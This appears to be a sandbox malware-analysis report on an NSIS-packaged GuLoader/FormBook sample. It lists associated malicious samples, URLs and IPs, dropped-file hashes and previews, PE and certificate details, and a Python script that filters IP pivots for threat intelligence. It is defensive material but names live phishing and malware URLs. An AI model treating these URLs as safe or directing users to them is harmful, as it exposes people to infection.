  https://4wbjllyl92.oparberamn.store/  malicious  HTMLPhisher  • 1.1.1.1
                                                XP1XNeOXU0.exeGet hashmaliciousFormBook, DBatLoaderBrowse
                                                • 172.67.214.158
                                                SecuriteInfo.com.HEUR.Trojan.Win32.Makoob.gen.19552.3875.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                • 172.67.130.83
                                                https://advanceds-ip-scanner.netGet hashmaliciousUnknownBrowse
                                                • 1.1.1.1
                                                file.exeGet hashmaliciousAmadey, Babuk, Djvu, Glupteba, RedLine, SmokeLoader, VidarBrowse
                                                • 104.21.65.24
                                                https://hoanoola.net/4/6246380Get hashmaliciousUnknownBrowse
                                                • 104.16.126.175
                                                https://media.muckrack.com/portfolio/items/14857686/b8bec56432c329c8ac6f24f55210d57d.pdfGet hashmaliciousUnknownBrowse
                                                • 172.67.220.238
                                                http://www.alfadaiyat.com/Get hashmaliciousUnknownBrowse
                                                • 104.17.24.14
                                                file.exeGet hashmaliciousAmadey, Babuk, Djvu, Glupteba, RedLine, SmokeLoader, VidarBrowse
                                                • 172.67.196.133
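The table above lists other submissions that contacted the same IPs. The Python script below is an added example, not part of the Joe Sandbox report: it parses a copy of those rows in the flattened form this page shows them and keeps only the IPs worth pivoting on, that is, IPs also contacted by samples carrying this report's own families (FormBook, GuLoader) and not sitting inside a shared-tenant ASN such as CLOUDFLARENETUS, since a Cloudflare edge address or the 1.1.1.1 resolver is shared by unrelated tenants and is not attributable infrastructure. The ASN label of the 103.224.x.x group lies outside this excerpt, so a placeholder name stands in for it.

```python
"""Pivot on the 'associated samples by contacted IP' table of a sandbox report.

Added example, not part of the report. Rows are copied from the table above
in the flattened form the page shows them (name, 'Get hash', detection,
threat names, 'Browse', then the contacted IP on the next line). The first
group's ASN label is not in this excerpt; a placeholder stands in for it.
"""
import re
from collections import defaultdict
from typing import NamedTuple

# Flattened row as rendered on the page: <name>Get hash<detection><threats>Browse
ROW = re.compile(
    r"^(?P<name>.+?)Get hash(?P<detection>malicious|suspicious|clean|unknown)"
    r"(?P<threats>.*?)Browse$"
)

GROUP_A = """
http://evilserver.xyzGet hashmaliciousBabadeda, DarkSideBrowse
• 103.224.212.220
http://oopatet.com/javascript/fingerprint/iife.min.jsGet hashmaliciousUnknownBrowse
• 103.224.182.206
https://l.ead.me/beMg3rGet hashmaliciousHTMLPhisherBrowse
• 103.224.212.221
po#_348839.exeGet hashmaliciousFormBook, NSISDropperBrowse
• 103.224.182.252
Oder_VGMS123007.exeGet hashmaliciousFormBook, NSISDropperBrowse
• 103.224.182.252
IDzTyPghZg.exeGet hashmaliciousUnknownBrowse
• 103.224.212.34
QUOTATION.exeGet hashmaliciousFormBook, NSISDropperBrowse
• 103.224.182.252
EFT_INVOICE.exeGet hashmaliciousFormBook, NSISDropperBrowse
• 103.224.182.252
"""

GROUP_CLOUDFLARE = """
https://advanceds-ip-scanner.netGet hashmaliciousUnknownBrowse
• 1.1.1.1
7ajp1lfDeg.exeGet hashmaliciousRedLineBrowse
• 104.21.93.225
Advance_payment.docGet hashmaliciousFormBookBrowse
• 104.21.53.238
XP1XNeOXU0.exeGet hashmaliciousFormBook, DBatLoaderBrowse
• 172.67.214.158
SecuriteInfo.com.HEUR.Trojan.Win32.Makoob.gen.19552.3875.exeGet hashmaliciousFormBook, GuLoaderBrowse
• 172.67.130.83
"""


class Association(NamedTuple):
    asn: str
    name: str
    detection: str
    threats: tuple  # empty when the report says "Unknown"
    ip: str


def parse_group(asn: str, text: str) -> list:
    """Parse one ASN group: each row line is followed by the IP it was seen on."""
    lines = [ln.strip().lstrip("• ") for ln in text.splitlines() if ln.strip()]
    if len(lines) % 2:
        raise ValueError("expected alternating row/IP lines")
    out = []
    for row, ip in zip(lines[0::2], lines[1::2]):
        m = ROW.match(row)
        if not m:
            raise ValueError(f"unparsable row: {row!r}")
        raw = m["threats"].strip()
        threats = () if raw in ("", "Unknown") else tuple(t.strip() for t in raw.split(","))
        out.append(Association(asn, m["name"], m["detection"], threats, ip))
    return out


def shared_pivots(records, families, weak_asns=frozenset()) -> dict:
    """IPs also contacted by other samples of the given families, names sorted.

    IPs in weak_asns are dropped: a CDN edge or the 1.1.1.1 resolver is shared
    by unrelated tenants and is not attributable infrastructure.
    """
    hits = defaultdict(set)
    for r in records:
        if r.asn not in weak_asns and families & set(r.threats):
            hits[r.ip].add(r.name)
    return {ip: sorted(names) for ip, names in sorted(hits.items())}


def report_pivots() -> dict:
    """Pivots for this report's own detections (FormBook, GuLoader)."""
    records = parse_group("ASN-NOT-IN-EXCERPT", GROUP_A)  # placeholder ASN name
    records += parse_group("CLOUDFLARENETUS", GROUP_CLOUDFLARE)
    return shared_pivots(records, {"FormBook", "GuLoader"}, {"CLOUDFLARENETUS"})


if __name__ == "__main__":
    for ip, names in report_pivots().items():
        print(ip, "->", ", ".join(names))
```

Run as a script it prints one line per surviving pivot. With the rows above that is only 103.224.182.252, shared by four FormBook/NSISDropper submissions; the three Cloudflare-fronted FormBook hits are discarded, and passing an empty set as weak_asns to shared_pivots brings them back for comparison.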
No context

Match: C:\Users\user\AppData\Local\Temp\nsz7A32.tmp\System.dll
Associated Sample Name / URL | Detection | Threat Name
#U4e5d#U6708#U58f0#U660e_40981677.xls | malicious | GuLoader
MaMsKRmgXZ.exe | malicious | FormBook, GuLoader
MaMsKRmgXZ.exe | malicious | GuLoader
Part_number_91875-11400_x_6.xls | malicious | GuLoader
3CoQ2gnbIu.exe | malicious | GuLoader
3CoQ2gnbIu.exe | malicious | GuLoader
Zc8N38ZHPi.exe | malicious | GuLoader
Zc8N38ZHPi.exe | malicious | GuLoader
SOA_OCT.exe | malicious | FormBook, GuLoader
SOA_OCT.exe | malicious | GuLoader
Cargo_manifest_&_BL_10784813.exe | malicious | GuLoader
Cargo_manifest_&_BL_10784813.exe | malicious | GuLoader
Payment_Advice-pdf.exe | malicious | Remcos, GuLoader
Payment_Advice-pdf.exe | malicious | GuLoader
Civilizee.exe | malicious | GuLoader
Civilizee.exe | malicious | GuLoader
RFQ6789034SEPT23_prodotto_Prodital_Italia_Srl.exe | malicious | GuLoader, Remcos
RFQ6789034SEPT23_prodotto_Prodital_Italia_Srl.exe | malicious | GuLoader
RFQ____RM_quotation_JPEG_IMAGE.exe | malicious | GuLoader, Remcos
Process: C:\Windows\explorer.exe
File Type: data
Category: dropped
Size (bytes): 787
Entropy (8bit): 7.521764173174906
Encrypted: false
SSDEEP: 12:oklXcUyYFBLSzqgdyQAvTOk7rqt+Ntql/vMWOor2zqf9QgufjTISdY/WT/5MCqao:osFBLWqgdxKOt+rq9vMWVYt3me+CY
MD5: 9009B9C95545BA03EA0CF564696E48BF
SHA1: 8A9891584DB7716972970D81D1C0F5035681E184
SHA-256: 7014E541CD3C91DEC69D93101B2CE6F4CC99298AAA4CF11B579D5CF4D555A295
SHA-512: 62F00A7F17B348F2AFAAD48D4723EAF68EDC1A78FC20816A57A1D22161F5A5E36593C78221CCF6CC913EAFEC6DE2F1518785310C07AA952EC2C1F65CCD1AD069
Malicious: false
Reputation: low
                                                                                      Preview:..v........H...g..1..3.cv.................D.................2..w.[0x.c`@..Gsy@"L@... .(..............J.Pp.H;.8@...@B.@u .01.... ....1H?H...@....@k....4..(.`.c...............+.`......^p%...c`.X`..].n.*......{..*..n.+....4.].".....(...W.G.w...g......fT`.*........l.....@....L..L......4?s~.".......l....8.@..E.`.&........?..;.G..~.)...@..+...>...E........z..G'.~."...#..............................+&.e.x..T;N.@.......H)..Z"N..r.E.:...7..t...).........@.T....r,a>.B..<.....Y.}ND'.kw>.....tP........vX....k`.a.5p...."..5./.{...'..4:..N..Wv.>....`3..d...s}I.q...3...J]i.m........._s.q.......o.qw.5Y.........g.."8gt.Q..w....|!MI...SS._...W]...t..^...7.z.5...o...Z.../...|..~.........i5Jx}.@............g..8T.?T.......d....R{r+(-.j.......D|...7...^..V..V.....:.
Process: C:\Windows\explorer.exe
File Type: data
Category: dropped
Size (bytes): 338
Entropy (8bit): 3.4332659693513445
Encrypted: false
SSDEEP: 6:kK/8zaJFN+SkQlPlEGYRMY9z+s3Ql2DUevat:nGkPlE99SCQl2DUevat
MD5: 07744B4D9CAEDFFCAAA916174CA7D75A
SHA1: C88F1A9A27648F13F10EE878F8C3F7EF5C8F842E
SHA-256: BC662F221C65C82D10E3C58403BEB7ED18A5C643560806D58B38F54C783B6FC0
SHA-512: BE0434B6135DCD96E7F4835B8BBB4A41A2752AFB5EECE0EC65FDBE7B20066715966BF681E7436C7A889A3D448DA2D06117802C90A87409E8C076386E01576D7F
Malicious: false
Reputation: low
Note: the UTF-16 URL in the preview (ctldl.windowsupdate.com, disallowedcertstl.cab) is the Windows disallowed-certificate trust list download; this is CryptoAPI URL-cache metadata written by explorer.exe during routine certificate-trust-list maintenance, not attacker infrastructure.
                                                                                      Preview:p...... ............"...(.................................................f9.... .........p.........$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.d.i.s.a.l.l.o.w.e.d.c.e.r.t.s.t.l...c.a.b...".7.4.6.7.8.7.a.3.f.0.d.9.1.:.0."...
Process: C:\Windows\explorer.exe
File Type: SVG Scalable Vector Graphics image
Category: modified
Size (bytes): 11264
Entropy (8bit): 5.260054102278554
Encrypted: false
SSDEEP: 192:SPPWd5QztRAbpUsjWmeJ0G6b96W96696j96z196ei:SP0bUYWmXG6Z6I6k6R6zL6ei
MD5: 0A159C594868E6471DE13916BC87D0EA
SHA1: 0EFBA7BD2C03EC77D65212CAEA7337868A9A75B5
SHA-256: 5B1811C95601A56BF9E1954B22C59A0B6C34A3A8CFFB611B121A9ED387F351B0
SHA-512: EB94D904048AB931A04DE6614EB74501953250502A5CA6DD1B585CA2A06599697465C805562A81A7781BCB13ABBD78A20B93F1A7AD96211197C195A8EF738B5B
Malicious: false
Reputation: low
                                                                                      Preview:<svg width="72" height="72" viewBox="0 0 72 72" fill="none" xmlns="http://www.w3.org/2000/svg">..<g clip-path="url(#clip0_1844_47040)">..<g filter="url(#filter0_d_1844_47040)">..<path d="M25.5619 71.4198C21.0122 71.4198 17.3104 67.7183 17.3104 63.1686V59.1729C17.3104 58.4886 17.5822 57.8324 18.0661 57.3485C18.5499 56.8646 19.2062 56.5928 19.8905 56.5928C20.5748 56.5928 21.231 56.8646 21.7149 57.3485C22.1988 57.8324 22.4706 58.4886 22.4706 59.1729V63.1686C22.4706 64.8728 23.8574 66.2596 25.5619 66.2596C27.2661 66.2596 28.6529 64.8728 28.6529 63.1686V24.1741C28.6529 23.4898 28.9248 22.8336 29.4086 22.3497C29.8925 21.8658 30.5488 21.594 31.233 21.594C31.9173 21.594 32.5736 21.8658 33.0575 22.3497C33.5413 22.8336 33.8132 23.4898 33.8132 24.1741V63.1686C33.8132 67.7183 30.1117 71.4198 25.5619 71.4198Z" fill="#7B7776"/>..<path d="M33.1691 22.7634C33.1691 23.6316 31.82 24.3357 30.9518 24.3357C30.0836 24.3357 28.7345 23.6316 28.7345 22.7634L29.3795 15.5874C29.3795 15.1704 29.5452 14.7705 29.84
Process: C:\Windows\explorer.exe
File Type: SVG Scalable Vector Graphics image
Category: dropped
Size (bytes): 2406
Entropy (8bit): 5.224489747966877
Encrypted: false
SSDEEP: 48:1SLrvojojf/A2jeaAH6hCH6i2hH6Ox9mHcMhq+LJG:4rvojojoaALGzU89
MD5: 9D3EEE9686D790B056BC4BC4F88DA70A
SHA1: FF2EF21A44879BAD234D91100C9C30CAD2293375
SHA-256: 9CF7ACD58FCB341E35111C98B0A12D47A155552447EC7EB0204E5F77EEB6185E
SHA-512: 521EA52E0E9E12A721BFC5CD69B36288C03AC6F59DBF65EF130B61A34E80874FBE9C21FF2E0F3D9529E60ACBDCEF22BA4003DAA9A3A78A0F1FFDD9F27245EFAF
Malicious: false
                                                                                      Preview:<svg xmlns="http://www.w3.org/2000/svg" width="72" height="72" fill="none" viewBox="0 0 72 72">.. <path fill="#C4C4C4" d="M28.469 38.648 43.464 4.065c2.395-5.525 10.297-5.386 12.496.22l13.318 33.958c3.186 5.953 3.72 13.245.827 19.92C65.064 69.79 51.53 75.138 39.875 70.11c-11.653-5.028-17.014-18.528-11.973-30.154.193-.445.398-.881.615-1.308h-.048Z"/>.. <path fill="url(#a)" d="M28.469 38.648 43.464 4.065c2.395-5.525 10.297-5.386 12.496.22l13.318 33.958c3.186 5.953 3.72 13.245.827 19.92C65.064 69.79 51.53 75.138 39.875 70.11c-11.653-5.028-17.014-18.528-11.973-30.154.193-.445.398-.881.615-1.308h-.048Z"/>.. <path fill="url(#b)" d="M1 9h16v54H1V9Z"/>.. <g filter="url(#c)">.. <path fill="url(#d)" fill-rule="evenodd" d="M5.228 9H1v54h4.228V51.404h3.463c1.18 0 2.138-.922 2.138-2.058 0-1.136-.957-2.058-2.138-2.058H5.228V38.81h6.634c1.18 0 2.138-.921 2.138-2.057 0-1.137-.957-2.058-2.138-2.058H5.228v-8.48h3.463c1.18 0 2.138-.922 2.138-2.059 0-1.136-.957-2.057-2.138-2.057H5.228V9Z" clip-rule
Process: C:\Users\user\Desktop\jU0hAXFL0k.exe
File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 11776
Entropy (8bit): 5.854901984552606
Encrypted: false
SSDEEP: 192:qPtkiQJr7V9r3HcU17S8g1w5xzWxy6j2V7i77blbTc4U:F7VpNo8gmOyRsVc4
MD5: 0063D48AFE5A0CDC02833145667B6641
SHA1: E7EB614805D183ECB1127C62DECB1A6BE1B4F7A8
SHA-256: AC9DFE3B35EA4B8932536ED7406C29A432976B685CC5322F94EF93DF920FEDE7
SHA-512: 71CBBCAEB345E09306E368717EA0503FE8DF485BE2E95200FEBC61BCD8BA74FB4211CD263C232F148C0123F6C6F2E3FD4EA20BDECC4070F5208C35C6920240F0
Malicious: false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
• Antivirus: Virustotal, Detection: 0%
Joe Sandbox View:
• Filename: #U4e5d#U6708#U58f0#U660e_40981677.xls, Detection: malicious
• Filename: MaMsKRmgXZ.exe, Detection: malicious
• Filename: MaMsKRmgXZ.exe, Detection: malicious
• Filename: Part_number_91875-11400_x_6.xls, Detection: malicious
• Filename: 3CoQ2gnbIu.exe, Detection: malicious
• Filename: 3CoQ2gnbIu.exe, Detection: malicious
• Filename: Zc8N38ZHPi.exe, Detection: malicious
• Filename: Zc8N38ZHPi.exe, Detection: malicious
• Filename: SOA_OCT.exe, Detection: malicious
• Filename: SOA_OCT.exe, Detection: malicious
• Filename: Cargo_manifest_&_BL_10784813.exe, Detection: malicious
• Filename: Cargo_manifest_&_BL_10784813.exe, Detection: malicious
• Filename: Payment_Advice-pdf.exe, Detection: malicious
• Filename: Payment_Advice-pdf.exe, Detection: malicious
• Filename: Civilizee.exe, Detection: malicious
• Filename: Civilizee.exe, Detection: malicious
• Filename: RFQ6789034SEPT23_prodotto_Prodital_Italia_Srl.exe, Detection: malicious
• Filename: RFQ6789034SEPT23_prodotto_Prodital_Italia_Srl.exe, Detection: malicious
• Filename: RFQ____RM_quotation_JPEG_IMAGE.exe, Detection: malicious
Note: nsz7A32.tmp\System.dll is the stock NSIS System plugin that NSIS installers extract to their temporary directory, which is why both scanners report 0% and the same hash is associated with many unrelated GuLoader submissions in the Joe Sandbox View list. The matches show that those samples are NSIS-packaged, not that they share code with this one; the hash is not an indicator on its own.
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ir*.-.D.-.D.-.D...J.*.D.-.E.>.D.....*.D.y0t.).D.N1n.,.D..3@.,.D.Rich-.D.........PE..L......]...........!..... ..........!).......0...............................`............@..........................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..c....0.......$..............@..@.data...h....@.......(..............@....reloc..|....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Users\user\Desktop\jU0hAXFL0k.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 42
Entropy (8bit): 4.308751351247167
Encrypted: false
SSDEEP: 3:T9RurfyWGRMWyn:TaSMWyn
MD5: F54A2E254A72D0CC8E1EF8327CB8A7B5
SHA1: B5635CB7A221E52073F56017FD4DBE36BAAC3228
SHA-256: DB054403B148F267DE03752254EB25A8E981E59CA9F6E93F3E39C1E9D70405A7
SHA-512: 5A343BD2A70006CEE64831AB815DCAF1170BC7282378670236A835799DD1292B0A6D7496B863C3522F4379A94E0365DE5367F93D275A09D9A8F97A3426983382
Malicious: false
                                                                                      Preview:[coryphodont]..Antihemorrheidal=bursitis..
Process: C:\Users\user\Desktop\jU0hAXFL0k.exe
File Type: data
Category: dropped
Size (bytes): 86434
Entropy (8bit): 4.596147320376854
Encrypted: false
SSDEEP: 1536:3bje52+ESCvPspqbrBoZDdRxR9oEOWU0HqkL:3bq1fCvPOmrc5Rz9nWm
MD5: DCDA6C782E8D6EE806DD3E1A71575B12
SHA1: DD5394A4443E7E1CDBA0E565D8F0095854CEB3A5
SHA-256: 088C8536AF2896DF8E6873107C4183D013D137C924BBE8C32F29A35D46874DBB
SHA-512: 5AE46A43F73EBE19DB3B4A0FA6A3EAA70875EA34F23CC0565F9872D3FD6D6E3B1A8E4E5658BDDA750D26BDEF5BBFAAD6D47F7BA5D7A27C38A70B7C6876A8BE8D
Malicious: false
                                                                                      Preview:............x.,.........yyyy.................Q.................,.............................;;;.........i....u................(((.11111.......V.3.....5...}........]]......w..........LLLL....z..............H..........._.................xxx.................ggg...................N..................................e..|..............9.....................P.......``............... ............................ssssss...t.....8.........S..7..........,,,......................G..^.......PP.66666.???..ll.............Q....^^^.....]]].........pppppp..777...............k...''........B....................~.....M........======.......N.....u.999...nnn.........,,...........II.7.........+...........................y................uu.$...;......\\\.......*...........................................................R....OO.....P...[[....e...............................................NNNNN......................H........ee.@....................''.....L........................................1..........bb.$$
Process: C:\Users\user\Desktop\jU0hAXFL0k.exe
File Type: DIY-Thermocam raw data (Lepton 2.x), scale 246-148, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 0.000000, slope 2362119990157315670016.000000 (a libmagic best-effort match on an unrecognised blob, not a real thermal image; treat the file as opaque data like the other large files this sample drops)
Category: dropped
Size (bytes): 163779
Entropy (8bit): 4.938326189697288
Encrypted: false
SSDEEP: 3072:KNwfAuxv4zSDxRWO0kdxyjf5TWKuT56kieBNKYAqrszfq:6wffxA+tR8jV9uT5vieBNKYfgu
MD5: 0782692CFF38628B70495E562B2614A1
SHA1: 1CF24A8842C79FA929D31571AEB187673A91CF22
SHA-256: 136B62E6481EF62303BD2305C8FB497CE931521C71CB331CB92179621D558E20
SHA-512: 613F3E3CF46FE6222AD7C8562C785A23190502B4B4EEEF54CFFEB381AA1D7F71D1C307D480489046E34C6E4981594DB29E6E86382A49D8CFAB530E757DAA8B22
Malicious: false
                                                                                      Preview:. ......W...........)E..............................U...^.w....U........'....#.......18.{U....*.....?..........U....j....a.........-.d...7.3.[...'.h.v......D...}../....................!......t......................-.%:......H.D......./V...<.......h....z.b...R...............ju...s=Ee...j.............o......GA....(.....Z........................I.M....&8...,........,...-.......... .7.<............J5..........ix./.}&...c..D!........."..............N...........7.n].".......F..j..~...q..i..u..e.....8.......7A.....&.........Y.......D.....=...a........g...kUv.......{...Hm....................l......Y.......o............5.....G....%.......LK.............^....>........3.C......_..].O...B........W.b8.p.X.......n.%f'v...;........%....5...6........._...........&......\........r......o/Y*.....\...J.Hh.......X9..-uL.......(..dB.........v.............%.......q...z..............!.....6...._..............d..........x................L.............Ui...........d..&...Q(....N..+.F............
Process: C:\Users\user\Desktop\jU0hAXFL0k.exe
File Type: data
Category: dropped
Size (bytes): 1390858
Entropy (8bit): 5.47049513454331
Encrypted: false
SSDEEP: 12288:4iaNjSuAdwvibD6iNM4Fe4IeLIK12pGOifrwpSO1VmTE1tjGcMMvLLIikq5wa:mN2ivuNhbI9pGOQmSO1VHacVTLI9q6a
MD5: D4910FD9A8A5BBF2030E2D2480BAC516
SHA1: B7CDA4C565EE6BCCB3956AFE5DC057CA9A1B5993
SHA-256: C5EC53E76C60CE7494228BA21E135C1698B8EF82365119DF3759BEC2DFECE45C
SHA-512: F917486869AF1F6AF4466DE5B2F62777885E5A4B4B5686DA8FD687A3F8A24975315A00AD887457D7675085DCAB9D05FBD76A4634143A8F744DD23D5808D95B50
Malicious: false
                                                                                      Preview:.........nn.."...............ttt..........ff.........[.).."........--......3....D......RR....rr.............44.....ccc.................4....//....hh..........;;;;;;;;;..UUUU.RRRRRR................}.p...................22222............$.##.......:............\.............J........N........x..................::::..yyy...........S......{...........gg..........:................11.... ...P...ddd...w........@..HH...................ccc......y.777..........AA................--....$$$$$$..^^......f.................c.........+..... .........................[[[..........,,.........ww.......SS......bbbb.....................zzz......+..H.....k..........%%%......\\.0......$$$$............y......hh............==..............b..rr..G.........................b....................)).2........TT................&&&&...........2222.__.............^^............a.........q...............X.....gg.........@........................qq.....}..........o....5..............))................g...............tt...
Process:C:\Users\user\Desktop\jU0hAXFL0k.exe
File Type:data
Category:dropped
Size (bytes):144737
Entropy (8bit):4.9429482615607165
Encrypted:false
SSDEEP:3072:5w8VNxOulgKUnkFg3sgS2fm0ieW5zym0HVCmV:5woLlgKUnkFHgSURz4zIrV
MD5:F84B9E2BDA2302BC917050F4F1B5C907
SHA1:8258DE54AEC259536F36285708D66E494D247905
SHA-256:8B4250121C2470B3E1458EE51E6DB638C7DAE2A188F24D9141849D267B65D36B
SHA-512:1AFD54A056CBB8D7D87DBAB318F46D77706C4F05735E52DE3301FD2A78EB36637CF534E2CED8638689C1904828829A11E1974D4679E1D297068E293DF6D55CA2
Malicious:false
Process:C:\Users\user\Desktop\jU0hAXFL0k.exe
File Type:data
Category:dropped
Size (bytes):243403
Entropy (8bit):4.95927012728034
Encrypted:false
SSDEEP:6144:ZATFfjMU61iyzkn+upJwQIkCqLWZNPzlmAZOibfQJGnbOKVy:sfjr61RO+uwQ5ENPzmib4Yy
MD5:894C5CFD443EABAA15BE7A7CCEA4E9F5
SHA1:C25D071C1BBDB7813B5A9EB8E7D04FFACB063389
SHA-256:3CE9F1F2DC922EB0ED91C0ED1264D17506B7B4EF065E49555F77A96317A3CCD5
SHA-512:FCD61116FAA5CCFB004CCAAFDA68AA42BAB7CF3AF8B0D0AD6AF67A0132434806765A1EBB4C36F12ED69745D1A3BE1F4A4C5AADCA15FECED53D37C004104CCAD0
Malicious:false
Process:C:\Users\user\Desktop\jU0hAXFL0k.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):456
Entropy (8bit):4.292190557993067
Encrypted:false
SSDEEP:12:U6cKWn1izXeejCThRvO4IQJWc05kC257zNC1NFLyx:U3KW1SeeYzvlIQJd0qC25MByx
MD5:1693541DFB1E3B101649889AAE97DC5B
SHA1:E9F89EE2A9F46ABB9738625B97600EE3B56B705D
SHA-256:A4943074FBBB15A41254082AB6FEA90FE5D302F6E6969E963F6B04A92B49F739
SHA-512:B72C8DB040CDA851C4D68110DB1E6CCBA2D90DF93AE829E03436F17223693014FBF2F68D4AC713FA0CF2A74055424250F5DB8C285CC8A767BF7C894788724EA7
Malicious:false
Preview:udviklingscenter tiljubler kurrende kaper politicalized vandindvindingsanlgget neuroleptanalgesia havergrass postique flise baptizer sprjtenarkomanen..imino udklippende forpakning unalterably.daedalean skeers fogyishness parathyroidectomised udlign autocrat maskinparkens teknokratiseret..rutebaadenes unpreventable bogkrybbens sknhedspletternes overstegnes slugtens dekorum,urbane serest selektionernes,liquify adfrdsmnstres polybranchian neall brandtale.
Process:C:\Users\user\Desktop\jU0hAXFL0k.exe
File Type:data
Category:dropped
Size (bytes):5935
Entropy (8bit):4.893001480959504
Encrypted:false
SSDEEP:96:wCHb7caV5pcvPQzcsG4LMvyER8TY8Vvj3B442oBIBr7qTRRtSubJuf+F5LzllGEt:dPcaV3cnQzc4LZECYQt2jqT1bJuWjLzR
MD5:064C026C4CAA1483900E7AC2C0DFFF1C
SHA1:EAAF94292A01CF711B27321265A929E4C8F2A9DF
SHA-256:B3E57DBE2DE42502F0C3D005F8347C1B2B72B6A29EC80474921C6A274FF2E081
SHA-512:15B03A3DBB34CDB0AFA733FEF6761A4955A4891015F1A6E43EDFC86EB05790AA4C6929D8374A47AADDE4C911BB7F100E329C866E68959887DB9897761627300D
Malicious:false
File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):7.983367304390116
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:jU0hAXFL0k.exe
File size:1'272'864 bytes
MD5:6e8215eee3034d6dcf18d79d397e5715
SHA1:5612bff0830a9a025eb35cf7c054d2062745d1b9
SHA256:ac4761c259daede4b4efb78816c98fb56344e381bb56d69ea897c30c9899bf39
SHA512:5b5a08e02c7f58f25a436508848f90d397c2545b474f37202cef5f8ba9d4924761e500a2d54e082f51eabd80b2cc33d21d73b45206d79e64c7bb0ce21abf83c1
SSDEEP:24576:ZQ3IGHgEKN05uKEPfbze1J9c8ae1D1FkTaO/bwntZKo4PCnsoO+Lt:ZQ3IbGEf+X9Xtk2O/bw7KpCnsa5
TLSH:2C45236023C1D97BEB5A47F4AA9E29FAA1E4CE87DD28860B93143F713F723458D214D1
Icon Hash:272707636343090f
Entrypoint:0x403235
Entrypoint Section:.text
Digitally signed:true
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:0x5DF6D4E3 [Mon Dec 16 00:50:43 2019 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:4
OS Version Minor:0
File Version Major:4
File Version Minor:0
Subsystem Version Major:4
Subsystem Version Minor:0
Import Hash:e9c0657252137ac61c1eeeba4c021000
Signature Valid:false
Signature Issuer:E=Afruse@Paaberaabtes.Unp, OU="Perfay puces ", O=Absorberer, L=Hermerode, S=Sachsen-Anhalt, C=DE
Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:-2146762487
Not Before, Not After:
• 15/03/2023 09:03:08, 14/03/2026 09:03:08
Subject Chain:
• E=Afruse@Paaberaabtes.Unp, OU="Perfay puces ", O=Absorberer, L=Hermerode, S=Sachsen-Anhalt, C=DE
Version:3
Thumbprint MD5:D200528519AD6686EEFFD2596A2A2F55
Thumbprint SHA-1:597512FD1BFD1E677353ED0A5021A23E7F5CC129
Thumbprint SHA-256:874162BB890EF7A67C60203F2DD0E4EE2F4015C6F2C437BC175010C6AE2FB567
Serial:57F1B2B5B2C4B7C9C1DEF821A4632D692E16B719
Instruction (entrypoint disassembly):
sub esp, 00000184h
push ebx
push esi
push edi
xor ebx, ebx
push 00008001h
mov dword ptr [esp+18h], ebx
mov dword ptr [esp+10h], 00409198h
mov dword ptr [esp+20h], ebx
mov byte ptr [esp+14h], 00000020h
call dword ptr [004070A0h]
call dword ptr [0040709Ch]
and eax, BFFFFFFFh
cmp ax, 00000006h
mov dword ptr [0042370Ch], eax
je 00007F3DD45EE7F3h
push ebx
call 00007F3DD45F18DBh
cmp eax, ebx
je 00007F3DD45EE7E9h
push 00000C00h
call eax
mov esi, 00407298h
push esi
call 00007F3DD45F1857h
push esi
call dword ptr [00407098h]
lea esi, dword ptr [esi+eax+01h]
cmp byte ptr [esi], bl
jne 00007F3DD45EE7CDh
push 0000000Ah
call 00007F3DD45F18AFh
push 00000008h
call 00007F3DD45F18A8h
push 00000006h
mov dword ptr [00423704h], eax
call 00007F3DD45F189Ch
cmp eax, ebx
je 00007F3DD45EE7F1h
push 0000001Eh
call eax
test eax, eax
je 00007F3DD45EE7E9h
or byte ptr [0042370Fh], 00000040h
push ebp
call dword ptr [00407040h]
push ebx
call dword ptr [00407284h]
mov dword ptr [004237D8h], eax
push ebx
lea eax, dword ptr [esp+38h]
push 00000160h
push eax
push ebx
push 0041ECC8h
call dword ptr [00407178h]
push 00409188h
Programming Language:
• [EXP] VC++ 6.0 SP5 build 8804
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x7430 | 0xa0 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x3a000 | 0x21d08 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x135408 | 0x1818 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x294 | .rdata
